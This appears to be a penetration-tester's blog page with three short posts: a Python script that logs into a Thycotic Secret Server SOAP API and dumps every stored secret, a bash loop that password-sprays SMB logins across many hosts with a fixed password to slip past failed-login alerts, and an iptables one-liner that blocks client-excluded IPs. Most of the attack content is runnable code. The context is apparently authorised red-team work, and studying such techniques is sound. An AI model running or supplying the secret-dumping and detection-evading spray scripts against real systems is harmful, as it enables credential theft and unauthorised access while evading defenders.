#!/usr/bin/env python3 from zeep import Client #Connect to the soap api endpoint client = Client("https://secretserver.example.com/SecretServer/webservices/SSWebservice.asmx?wsdl") #grab your auth token for all your requests token = client.service.Authenticate("user_here", "pass_here", "", "domain_here") #grab all secrets for the user searchSecret = client.service.SearchSecrets(token.Token, "*") #output the secret values for each secret for secret in searchSecret.SecretSummaries.SecretSummary: print(client.service.GetSecret(token.Token, secret['SecretId']))
Thursday, December 12, 2019
Pillage Thycotic Secret Server
If you want to grab all the secrets from Thycotic's secret server, use the SOAP API to pull them out. Assuming you have valid domain creds, run the following script.
Tuesday, December 10, 2019
Round Robin SMB Auth
Password sprays are very noisy internally. If the target has any sort of alerting in place, they'll see the spray light up their dashboard like a christmas tree. However, often times the alerts are only set up to count failed logins from a single IP. Spread out the auth and you may skirt around their detections:
Instead of throwing your auth attempts at one IP, throw them at many:
Instead of throwing your auth attempts at one IP, throw them at many:
username_file=/root/users.txt targets_file=/root/windows-hosts.txt how_deep_to_go=2000 for index in $(seq 1 ${how_deep_to_go}); do username=$(sed -n ${index}p ${username_file}) target=$(sed -n ${index}p ${targets_file}) echo "smbclient -U mydomainhere/${username}%Welcome1 -L //${target}" smbclient -U mydomainhere/${username}%Welcome1 -L //${target} done | tee smb-round-robin.out
Wednesday, December 4, 2019
Blacklist IPs Without Caring
Clients often give out a blacklist of IPs to not touch in an environment. Manually handling that in all the for loops and parsing can be a complete nightmare. It's way easier to make your box simply never speak to those blacklisted IPs at all, regardless of what commands you run. You can do this by implementing the blacklist within iptables.
Place the blacklist IPs or CIDRs in a file called "ip-blacklist.txt". Then go ahead and run the following line to import them into iptables.
You could easily modify that so you blacklist TCP/UDP ports, or whatever else iptables supports.
Place the blacklist IPs or CIDRs in a file called "ip-blacklist.txt". Then go ahead and run the following line to import them into iptables.
cat ip-blacklist.txt | xargs -I {} iptables -A OUTPUT -d {} -j DROP
You could easily modify that so you blacklist TCP/UDP ports, or whatever else iptables supports.
Subscribe to:
Posts (Atom)